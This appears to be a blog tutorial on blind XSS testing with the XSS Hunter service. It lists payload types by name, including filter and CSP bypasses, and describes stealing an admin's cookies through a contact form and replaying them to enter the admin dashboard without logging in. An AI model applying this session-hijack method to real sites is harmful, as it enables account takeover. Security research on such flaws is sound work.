Blind XSS using XSS Hunter

What is XSS Hunter?

XSS Hunter is a free service provided by @IAmMandatory with the aim of making it easier for researchers to find XSS vulnerabilities that are unreachable by researchers. This XSS hunter works by scanning vulnerable pages to get sensitive information such as User IP, User Cookies, URL of vulnerable Applications and getting screenshots of those pages.

How to make payload in XSS Hunter?

You only need to create an account at, then you will be asked to create a subdomain of the extension.

If you have created an account and have created a subdomain, you just have to open the payloads page, then there are many payloads that have been provided such as

  1. <script> Tag Payload - Basic XSS payload
  2. javascript: URI Payload - For use where URI's are taken as input.
  3.  <input> Tag Payload - For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
  4. <img> Tag Payload - Another basic payload for when <script> tags are explicitly filtered.
  5. <video><source> Tag Payload - HTML5 payload, only works in Firefox, Chrome and Opera
  6.  <iframe srcdoc= Tag Payload - HTML5 payload, only works in Firefox, Chrome and Opera
  7. XMLHTTPRequest Payload - For exploitation of web applications with Content Security Policies containing script-src but have unsafe-inline enabled.
  8. $.getScript() Payload - Example payload for sites that include JQuery.

XSS case that fits using XSS Hunter

XSS Hunter is very suitable in cases where the input payload will be sent to pages that are not accessible to researchers, such as the admin dashboard.

For example, there is a "contact us" form that provides a name, email, and message form for admins. In this form, the input sent will be entered into the admin dashboard. If we only use the payload to call the popup, of course we don't know whether in the admin dashboard the payload that we send is running or not.

But with this XSS Hunter, we can know that the message we send using this XSS payload is running or not. Because if it runs (Vulnerable), we as the owner of this payload will get notifications on our XSS Hunter account and will also get notifications via email.

Cookie Theft and Login to Admin account

as I explained earlier, we will get sensitive information from users who access this payload such as their browser cookies.

If the cookie contains a session or users token, we can use the cookie to enter the admin dashboard without having to login using a username and password.

You only access the vulnerable application, then change the cookie using the admin cookie that you get, the last step is to access the admin dashboard page.

To change our cookies to cookies the admin can use burpsuite or you can also install the cookie editor addons on the browser you are using.

I think that's enough for the discussion of XSS Hunter in this article. If you still don't understand, you can contact us via the "Contact Us" page.